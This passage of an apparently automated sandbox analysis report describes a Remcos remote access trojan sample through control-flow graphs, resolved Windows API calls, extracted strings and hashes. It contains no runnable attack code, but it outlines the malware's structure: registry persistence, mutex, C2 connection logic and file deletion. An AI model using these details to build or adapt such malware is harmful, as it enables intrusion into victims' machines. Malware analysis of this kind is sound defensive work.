40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 183 40ee4a-40ee54 call 409092 180->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->184 193 40ee59-40ee7d call 40247c call 434829 183->193 184->193 211 40ee8c 193->211 212 40ee7f-40ee8a call 436f10 193->212 203->178 217 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 211->217 212->217 272 40eede-40ef03 call 434832 call 401e65 call 40b9f8 217->272 286 40f017-40f019 234->286 287 40effc 234->287 272->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 272->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 356 40f194-40f1a7 call 401e65 call 401fab 346->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 
40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 409 40f2b4-40f2bb 405->409 410 40f2a8-40f2b2 CreateThread 405->410 413 40f2c9 409->413 414 40f2bd-40f2c0 409->414 410->409 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 413->418 415 40f2c2-40f2c7 414->415 416 40f307-40f31a call 401fab call 41353a 414->416 415->418 425 40f31f-40f322 416->425 418->416 425->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                          APIs
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000104), ref: 0040EA29
                                                                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                          • String ID: Access Level: $Administrator$C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-35QZU7$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                          • API String ID: 2830904901-1861927298
                                                                                          • Opcode ID: 31f67b7f9349debde381042254657aa1b99cc28215975a66d86bcc0b5d8edffb
                                                                                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                          • Opcode Fuzzy Hash: 31f67b7f9349debde381042254657aa1b99cc28215975a66d86bcc0b5d8edffb
                                                                                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 567 415220-415246 call 402093 * 2 call 41b580 560->567 568 41524b-415260 call 404f51 call 4048c8 560->568 584 415ade-415af0 call 404e26 call 4021fa 561->584 567->584 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 568->583 568->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->597 598 415b18-415b20 call 401e8d 584->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-4157ba call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 
402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->656 655->656 782 4157bc call 404aa1 656->782 783 4157c1-415a45 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a4a-415a51 783->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->584
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$ErrorLastLocalTime
                                                                                          • String ID: | $%I64u$5.1.3 Pro$C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-35QZU7$TLS Off$TLS On $hlight$name
                                                                                          • API String ID: 524882891-2282533485
                                                                                          • Opcode ID: 635f21381c8b2e83a4a2e9ec1df68d3819f873d9cd7c9afd032c5074743bbbae
                                                                                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                          • Opcode Fuzzy Hash: 635f21381c8b2e83a4a2e9ec1df68d3819f873d9cd7c9afd032c5074743bbbae
                                                                                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                          • API String ID: 994465650-2151626615
                                                                                          • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                                          • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                          • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                                          • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                          • String ID:
                                                                                          • API String ID: 3658366068-0
                                                                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1017 40da6f-40da94 call 401f86 1020 40da9a 1017->1020 1021 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1017->1021 1023 40dae0-40dae7 call 41c048 1020->1023 1024 40daa1-40daa6 1020->1024 1025 40db93-40db98 1020->1025 1026 40dad6-40dadb 1020->1026 1027 40dba9 1020->1027 1028 40db9a-40db9f call 43c11f 1020->1028 1029 40daab-40dab9 call 41b645 call 401f13 1020->1029 1030 40dacc-40dad1 1020->1030 1031 40db8c-40db91 1020->1031 1044 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1021->1044 1045 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1023->1045 1046 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1023->1046 1033 40dbae-40dbb3 call 43c11f 1024->1033 1025->1033 1026->1033 1027->1033 1039 40dba4-40dba7 1028->1039 1048 40dabe 1029->1048 1030->1033 1031->1033 1047 40dbb4-40dbb9 call 409092 1033->1047 1039->1027 1039->1047 1053 40dac2-40dac7 call 401f09 1045->1053 1046->1048 1047->1021 1048->1053 1053->1021
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LongNamePath
                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                          • API String ID: 82841172-425784914
                                                                                          • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                          • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1117 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1128 41b3ad-41b3bc call 4135e1 1117->1128 1129 41b3ee-41b3f7 1117->1129 1133 41b3c1-41b3d8 call 401fab StrToIntA 1128->1133 1131 41b400 1129->1131 1132 41b3f9-41b3fe 1129->1132 1134 41b405-41b410 call 40537d 1131->1134 1132->1134 1139 41b3e6-41b3e9 call 401fd8 1133->1139 1140 41b3da-41b3e3 call 41cffa 1133->1140 1139->1129 1140->1139
                                                                                          APIs
                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                          • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 782494840-2070987746
                                                                                          • Opcode ID: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                                          • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                          • Opcode Fuzzy Hash: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                                          • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

Control-flow Graph (basic blocks and edges; legend: Executed / Not Executed)
• 1208: 4137aa-4137c1 RegCreateKeyA -> 1209, 1210
• 1209: 4137c3-4137f8 call 40247c, call 401fab, RegSetValueExA, RegCloseKey -> 1211
• 1210: 4137fa -> 1211
• 1211: 4137fc-41380a call 401fd8
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
• RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
• RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238

Control-flow Graph

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
• CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID: !D@
• API String ID: 180926312-604454484

Control-flow Graph (basic blocks and edges; legend: Executed / Not Executed)
• 1357: 40d0a4-40d0d0 call 401fab, CreateMutexA, GetLastError
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
• GetLastError.KERNEL32 ref: 0040D0BE
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-35QZU7
• API String ID: 1925916568-2240621246

Control-flow Graph (basic blocks and edges; legend: Executed / Not Executed)
• 1360: 4135e1-41360d RegOpenKeyExA -> 1361, 1362
• 1361: 413642 -> 1363
• 1362: 41360f-413637 RegQueryValueExA, RegCloseKey -> 1363, 1364
• 1363: 413644 -> 1365
• 1364: 413639-413640 -> 1365
• 1365: 413649-413655 call 402093
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
• RegCloseKey.KERNEL32(?), ref: 0041362D
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
• RegCloseKey.KERNEL32(00000000), ref: 00413773
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
• RegCloseKey.KERNEL32(?), ref: 004135CD
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
• RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
• RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
• RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0

APIs
